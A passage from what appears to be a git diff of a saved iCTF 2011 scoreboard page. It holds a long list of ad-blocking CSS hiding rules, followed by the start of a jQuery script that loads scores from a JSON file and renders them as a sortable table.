nt,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/score-chart.html b/ictf2011/scoreboard.ictf2011.info_files/score-chart.html @@ -0,0 +1,204 @@ +<!DOCTYPE html> +<!-- saved from url=(0048)http://scoreboard.ictf2011.info/score-chart.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Score Chart</title> + +<style type="text/css"> +body {background-color:#131a22; +font-family:monospace; +} +</style> +<script type="text/javascript" src="jquery.min.js"></script> +<script type="text/javascript" src="jquery.tablesorter.min.js"></script> + +<script type="text/javascript"> + +function UpdateList(tableId) +{ + $.getJSON("json/score_chart.json",function(data) + { + var first = 0; + var sortList = []; + if(data.Error) + { + var table_data = "<thead class='score_table_head'><tr><td>"+data.Error+"</td></tr></thead>"; + $(table_data).appendTo(tableId); + return; + } + h = $('.score_table_head'); + if(h.length == 0) + { + first = 1; + var table_head = "<thead class='score_table_head'><tr>" + $.each(data.header, function(i,h) + { + if(h.length > 7) + { + table_head +="<th title=\""+h+"\">"+h.substring(0,6)+"..</th>"; + }else + { + table_head +="<th title=\""+h+"\">"+h+"</th>"; + } + }); + table_head += "</tr></thead>" + + $(table_head).appendTo(tableId); + }else + { + var x = h.find("th"); + for(var i =0;i<x.length;i++) + { + hr = x[i]; + if(hr.className == "header headerSortDown") + { sortList = [i,0]; } + if(hr.className == "header headerSortUp") + { sortList = [i,1]; } + } + } + + $('tbody').remove('.score_table_body'); + + var table_body = "<tbody class='score_table_body'>" + var classAlt = ["d0","d1"]; + var i=0; + $.each(data.rows, function(i,rows) + { + table_body += "<tr 